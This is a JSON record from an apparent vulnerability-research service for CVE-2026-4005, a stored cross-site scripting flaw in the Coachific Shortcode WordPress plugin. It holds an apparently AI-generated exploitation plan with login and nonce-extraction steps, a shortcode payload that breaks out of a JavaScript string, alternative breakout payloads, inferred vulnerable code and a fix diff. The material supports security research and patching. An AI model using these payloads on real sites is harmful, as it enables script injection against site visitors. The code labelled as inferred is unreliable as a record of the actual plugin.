[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyljsn_cXDzQJ0Ydqu3Y062StOvo2B2Xi-_3g3z8j6f8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-4005","coachific-shortcode-authenticated-contributor-stored-cross-site-scripting-via-userhash-shortcode-attribute","Coachific Shortcode \u003C= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'userhash' Shortcode Attribute","The Coachific Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'userhash' shortcode attribute in all versions up to and including 1.0. This is due to insufficient input sanitization and output escaping. The plugin uses sanitize_text_field() on the 'userhash' parameter, which strips HTML tags but does not escape characters significant in a JavaScript string context (such as double quotes, semicolons, and parentheses). The sanitized value is then directly interpolated into a JavaScript string within a \u003Cscript> tag on line 29 without any JavaScript-specific escaping (e.g., wp_json_encode() or esc_js()). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","coachific-shortcode",null,"\u003C=1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:47:11","2026-04-15 08:28:14",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3d91158c-0b34-460e-9fdb-b99165ebca78?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4005 (Coachific Shortcode XSS)\n\n## 1. Vulnerability Summary\nThe **Coachific Shortcode** plugin (versions \u003C= 1.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to properly escape the `userhash` attribute of its shortcode when outputting it inside a `\u003Cscript>` tag on line 29 of the processing file. While the plugin uses `sanitize_text_field()` on the input, this function is insufficient for JavaScript contexts as it does not escape characters like single quotes (`'`), which can be used to break out of a JavaScript string literal.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post\u002FPage Editor (`wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`).\n*   **Shortcode:** `[coachific_shortcode]` (inferred) or similar, using the `userhash` attribute.\n*   **Attribute:** `userhash`.\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts and embed shortcodes.\n*   **Preconditions:** The plugin must be active. A Contributor or higher user must be able to save a post containing the malicious shortcode.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers a shortcode, likely via `add_shortcode( 'coachific_shortcode', 'handler_function' )` in the main plugin file.\n2.  **Processing:** When a post containing `[coachific_shortcode userhash=\"...\"]` is viewed, the handler function is triggered.\n3.  **Sanitization:** The handler retrieves the attributes and applies `sanitize_text_field( $atts['userhash'] )`.\n4.  **Vulnerable Sink (Line 29):** The sanitized `$userhash` is echoed directly into a `\u003Cscript>` block:\n    ```php\n    \u002F\u002F Inferred logic based on vulnerability description\n    echo \"\u003Cscript type='text\u002Fjavascript'>\";\n    echo \"var coachific_user_hash = '\" . $userhash . \"';\"; \u002F\u002F Line 29\n    echo \"\u003C\u002Fscript>\";\n    ```\n5.  **Execution:** Because `sanitize_text_field` allows single quotes, an attacker can provide a payload like `';alert(1)\u002F\u002F` to terminate the string and execute arbitrary JS.\n\n## 4. Nonce Acquisition Strategy (Authenticated)\nSince this exploit requires **Contributor-level** access to save a post, the agent must simulate an authenticated session.\n\n1.  **Login:** Perform a login to `wp-login.php` using Contributor credentials.\n2.  **Access Editor:** Navigate to `wp-admin\u002Fpost-new.php` to initiate a new post creation.\n3.  **Extract Nonces:** Use `browser_eval` to extract the necessary nonces for post creation\u002Fsaving:\n    - `document.querySelector('#_wpnonce').value` (for standard post submission).\n    - Or extract from the `wp-admin` page source if using the REST API \u002F Gutenberg.\n4.  **Intercept\u002FIdentify Action:** Standard WordPress post creation uses `action=editpost` or a REST API call to `wp-json\u002Fwp\u002Fv2\u002Fposts`.\n\n## 5. Exploitation Strategy\nThe goal is to store a shortcode that executes XSS when the post is rendered.\n\n### Step 1: Authentication\nUse the `http_request` tool to log in as a Contributor.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-login.php`\n*   **Body:** `log=contributor&pwd=password&wp-submit=Log+In&testcookie=1`\n*   **Header:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n### Step 2: Obtain Post Nonce\nNavigate to `wp-admin\u002Fpost-new.php` and extract the `_wpnonce`.\n*   **Action:** `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost-new.php\")`\n*   **Tool:** `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n\n### Step 3: Inject Stored XSS\nCreate a post containing the malicious shortcode.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method:** POST\n*   **Body (URL Encoded):**\n    ```\n    action=editpost\n    &post_ID=[NEW_POST_ID]\n    &_wpnonce=[EXTRACTED_NONCE]\n    &post_title=XSS_Test\n    &content=[coachific_shortcode userhash=\"';alert(document.domain)\u002F\u002F\"]\n    &publish=Publish\n    ```\n*   **Note:** If the exact shortcode name is unknown, the agent should first run `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcoachific-shortcode\u002F` to find the registered tag.\n\n### Step 4: Trigger Execution\nNavigate to the newly created post's frontend URL.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]`\n*   **Observation:** The browser should execute `alert(document.domain)`.\n\n## 6. Test Data Setup\n1.  **User Creation:** Create a user with the `contributor` role.\n    - `wp user create contributor contributor@example.com --role=contributor --user_pass=password`\n2.  **Plugin Activation:** Ensure the plugin is active.\n    - `wp plugin activate coachific-shortcode`\n\n## 7. Expected Results\n*   The HTML source of the rendered post should contain:\n    ```html\n    \u003Cscript type='text\u002Fjavascript'>var coachific_user_hash = '';alert(document.domain)\u002F\u002F';\u003C\u002Fscript>\n    ```\n*   An alert box with the site's domain should appear in the browser context.\n\n## 8. Verification Steps\n1.  **Verify Storage:** Use WP-CLI to check if the payload is in the database.\n    - `wp post get [POST_ID] --field=post_content`\n2.  **Verify Output:** Use `http_request` to fetch the post content and check for the broken-out `\u003Cscript>` tag.\n    - `grep \"alert(document.domain)\" response_body`\n\n## 9. Alternative Approaches\n*   **Double Quote Breakout:** If the plugin uses double quotes `var h = \"[userhash]\";`, use payload `\");alert(1)\u002F\u002F`.\n*   **Attribute Breakout:** If `sanitize_text_field` is more aggressive, try breaking out of the script tag itself if possible (though description says it's inside the string): `\u003C\u002Fscript>\u003Cscript>alert(1)\u003C\u002Fscript>`.\n*   **Shortcode Name Hunt:** If `[coachific_shortcode]` fails, search for the `add_shortcode` call in the plugin directory to find the exact tag and attribute names. (e.g., `grep -rn \"add_shortcode\" .`)","The Coachific Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'userhash' shortcode attribute. This occurs because the plugin fails to properly escape user-provided input before outputting it inside a JavaScript string literal within a \u003Cscript> tag, allowing contributors to execute arbitrary JavaScript in the context of other users' sessions.","\u002F\u002F coachific-shortcode.php or associated shortcode handler file\n\n$userhash = sanitize_text_field( $atts['userhash'] );\n\necho \"\u003Cscript type='text\u002Fjavascript'>\";\n\u002F\u002F Line 29\necho \"var coachific_user_hash = '\" . $userhash . \"';\";\necho \"\u003C\u002Fscript>\";","--- coachific-shortcode.php\n+++ coachific-shortcode.php\n@@ -26,4 +26,4 @@\n $userhash = sanitize_text_field( $atts['userhash'] );\n echo \"\u003Cscript type='text\u002Fjavascript'>\";\n-echo \"var coachific_user_hash = '\" . $userhash . \"';\";\n+echo \"var coachific_user_hash = '\" . esc_js( $userhash ) . \"';\";\n echo \"\u003C\u002Fscript>\";","The exploit is performed by an authenticated user with at least Contributor-level access. The attacker targets the WordPress post editor (wp-admin\u002Fpost-new.php) and inserts a shortcode using the 'userhash' attribute. Because the plugin only applies sanitize_text_field() to this attribute, characters like single quotes are not stripped. A payload such as [coachific_shortcode userhash=\"';alert(1)\u002F\u002F\"] is used to terminate the existing JavaScript string variable assignment and execute arbitrary code. Once the post is saved and viewed by any user, the malicious payload triggers automatically in the victim's browser.","gemini-3-flash-preview","2026-04-16 15:38:44","2026-04-16 15:39:04",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcoachific-shortcode\u002Ftags"]